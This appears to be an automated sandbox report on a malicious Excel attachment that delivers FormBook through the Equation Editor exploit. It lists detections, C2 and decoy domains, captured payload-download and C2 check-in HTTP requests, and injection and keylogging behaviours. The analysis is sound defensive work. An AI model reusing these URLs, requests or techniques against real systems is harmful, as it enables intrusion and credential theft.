Windows Analysis Report RFQ_Order_PO_TAE5203E.xlsx

Overview

General Information

Sample Name: RFQ_Order_PO_TAE5203E.xlsx
Analysis ID: 552838
MD5: 552f043a7c752ec7e8dddbdf0b36c4d8
SHA1: cfb4a5bea12cab9a47d3ff1ee1210d444b9a92a4
SHA256: e7a5f1c37a043773027f4937afb63d3178362113132066c7435b6d716eda6cf2
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Found hidden mapped module (file has been removed from disk)
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential key logger detected (key state polling based)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.dreamschools.online/b80i/"], "decoy": ["yixuan5.com", "jiazheng369.com", "danielleefelipe.net", "micorgas.com", "uvywah.com", "nbjcgl.com", "streets4suites.com", "hempgotas.com", "postmoon.xyz", "gaboshoes.com", "pastodwes.com", "libes.asia", "damusalama.com", "youngliving1.com", "mollyagee.com", "branchwallet.com", "seebuehnegoerlitz.com", "inventors.community", "teentykarm.quest", "927291.com", "wohn-union.info", "rvmservices.com", "cuanquotex.online", "buysubarus.com", "360e.group", "markham.condos", "carriewilliamsinc.com", "ennitec.com", "wildberryhair.com", "trulyrun.com", "pinkandgrey.info", "mnselfservice.com", "gabtomenice.com", "2thpolis.com", "standardcrypro.com", "58lif.com", "ir-hasnol.com", "ggsega.xyz", "tipslowclever.rest", "atlasgrpltdgh.com", "4338agnes.com", "hillsncreeks.com", "pentest.ink", "cevichiles.com", "evodoge.com", "gooooooo.xyz", "ehaszthecarpetbagger.com", "finanes.xyz", "zoharfine.com", "viperiastudios.com", "sjljtzsls.com", "frentags.art", "mediafyagency.com", "faydergayremezdayener.net", "freelance-rse.com", "quickmovecourierservices.com", "lexingtonprochoice.com", "farmacymerchants.com", "inkland-tattoo.com", "aloebiotics.com", "rampi6.com", "bookinggroningen.com", "wilkinsutotint.com", "inslidr.com"]}
Multi AV Scanner detection for submitted file
Source: RFQ_Order_PO_TAE5203E.xlsx Virustotal: Detection: 35% Perma Link
Source: RFQ_Order_PO_TAE5203E.xlsx ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED
Antivirus detection for URL or domain
Source: http://209.141.37.110/hnmy.exe Avira URL Cloud: Label: malware
Source: http://www.aloebiotics.com/b80i/?XXAT9NU=u8CFGDbLa+paDYPUt2HIfZvLGaLNzu7WkG1ejV9QOUI0TwLOmLGNbUmrlgsvnY/sa5UfOA==&bFQL=2dJLx4-Hc4v Avira URL Cloud: Label: malware
Source: www.dreamschools.online/b80i/ Avira URL Cloud: Label: phishing
Source: http://www.sjljtzsls.com/b80i/?XXAT9NU=S1GZrcUjP6Mqu1rkaE68XUwdav2ZAuLdhfc3NoUcKUpIPYlLOeb3MkcjdHuyJHfoxw3F9Q==&bFQL=2dJLx4-Hc4v Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://209.141.37.110/hnmy.exe Virustotal: Detection: 12% Perma Link
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\Public\vbc.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen3
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen3
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe Metadefender: Detection: 31% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp Metadefender: Detection: 50% Perma Link
Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp ReversingLabs: Detection: 89%
Source: C:\Users\Public\vbc.exe Metadefender: Detection: 31% Perma Link
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 60%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen3
Source: 4.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen3
Source: 5.0.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen3
Source: 8.2.msiexec.exe.2b5796c.6.unpack Avira: Label: TR/Patched.Gen
Source: 4.1.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen3
Source: 4.1.vbc.exe.2130000.1.unpack Avira: Label: TR/Crypt.XPACK.Gen3
Source: 5.0.vbc.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.560819872.0000000000460000.00000040.00020000.sdmp, vbc.exe, 00000005.00000002.560884485.00000000004EA000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.560868156.00000000004D9000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.560943288.0000000000750000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.526246673.00000000005C0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.561680130.00000000008D0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.525339285.00000000002B0000.00000004.00000001.sdmp, msiexec.exe
Source: C:\Users\Public\vbc.exe Code function: 4_2_00437A5E __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 4_2_00437A5E

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.aloebiotics.com
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_2_0040C40A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then pop edi 8_2_000DC40A
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 209.141.37.110:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 209.141.37.110:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 163.197.71.43:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 163.197.71.43:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 163.197.71.43:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 163.197.71.43 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.mediafyagency.com
Source: C:\Windows\explorer.exe Network Connect: 64.190.62.111 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.aloebiotics.com
Source: C:\Windows\explorer.exe Domain query: www.sjljtzsls.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.dreamschools.online/b80i/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: PONYNETUS PONYNETUS
Source: Joe Sandbox View ASN Name: NBS11696US NBS11696US
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /b80i/?XXAT9NU=u8CFGDbLa+paDYPUt2HIfZvLGaLNzu7WkG1ejV9QOUI0TwLOmLGNbUmrlgsvnY/sa5UfOA==&bFQL=2dJLx4-Hc4v HTTP/1.1Host: www.aloebiotics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b80i/?XXAT9NU=S1GZrcUjP6Mqu1rkaE68XUwdav2ZAuLdhfc3NoUcKUpIPYlLOeb3MkcjdHuyJHfoxw3F9Q==&bFQL=2dJLx4-Hc4v HTTP/1.1Host: www.sjljtzsls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 64.190.62.111 64.190.62.111
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 11 Jan 2022 22:12:56 GMTAccept-Ranges: bytesETag: "109cc962387d81:0"Server: Microsoft-IIS/8.5Date: Fri, 14 Jan 2022 03:08:59 GMTContent-Length: 598016Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 89 b6 f8 aa cd d7 96 f9 cd d7 96 f9 cd d7 96 f9 9b c8 85 f9 e8 d7 96 f9 cd d7 96 f9 f5 d7 96 f9 af c8 85 f9 de d7 96 f9 cd d7 97 f9 06 d6 96 f9 4e cb 98 f9 d6 d7 96 f9 25 c8 9c f9 46 d7 96 f9 25 c8 9d f9 ab d7 96 f9 75 d1 90 f9 cc d7 96 f9 52 69 63 68 cd d7 96 f9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 74 9f 46 58 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 e0 03 00 00 30 05 00 00 00 00 00 35 5a 02 00 00 10 00 00 00 f0 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 70 09 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 41 05 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 35 f0 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 1c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6d d7 03 00 00 10 00 00 00 e0 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 6c 01 00 00 f0 03 00 00 70 01 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 a3 00 00 00 60 05 00 00 60 00 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 e8 cc 00 00 00 10 06 00 00 d0 00 00 00 c0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 64 61 74 61 00 00 a5 8e 02 00 00 e0 06 00 00 90 02 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /hnmy.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 209.141.37.110Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.603581643.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000008.00000002.698588775.00000000020C0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.531428827.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: msiexec.exe, 00000008.00000002.699478869.0000000002CD2000.00000004.00020000.sdmp String found in binary or memory: http://sogou.9898top1.com/sscx.html
Source: explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.603581643.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000008.00000002.698588775.00000000020C0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.608259374.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.544945610.0000000008391000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.545161733.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551698331.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551589349.0000000008391000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.543545616.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.549824786.00000000044E7000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.545161733.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551698331.0000000008420000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.pir
Source: explorer.exe, 00000006.00000000.544945610.0000000008391000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.545161733.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551698331.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551589349.0000000008391000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: msiexec.exe, 00000008.00000002.699478869.0000000002CD2000.00000004.00020000.sdmp String found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=it&domain=aloebiotics.com&origin=sales_la
Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BCAAC72D.emf Jump to behavior
Source: unknown DNS traffic detected: queries for: www.aloebiotics.com
Source: global traffic HTTP traffic detected: GET /hnmy.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 209.141.37.110Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /b80i/?XXAT9NU=u8CFGDbLa+paDYPUt2HIfZvLGaLNzu7WkG1ejV9QOUI0TwLOmLGNbUmrlgsvnY/sa5UfOA==&bFQL=2dJLx4-Hc4v HTTP/1.1Host: www.aloebiotics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b80i/?XXAT9NU=S1GZrcUjP6Mqu1rkaE68XUwdav2ZAuLdhfc3NoUcKUpIPYlLOeb3MkcjdHuyJHfoxw3F9Q==&bFQL=2dJLx4-Hc4v HTTP/1.1Host: www.sjljtzsls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Potential key logger detected (key state polling based)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00432A4F GetKeyState,GetKeyState,GetKeyState,GetKeyState, 4_2_00432A4F
Source: C:\Users\Public\vbc.exe Code function: 4_2_00435DBA GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 4_2_00435DBA

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY
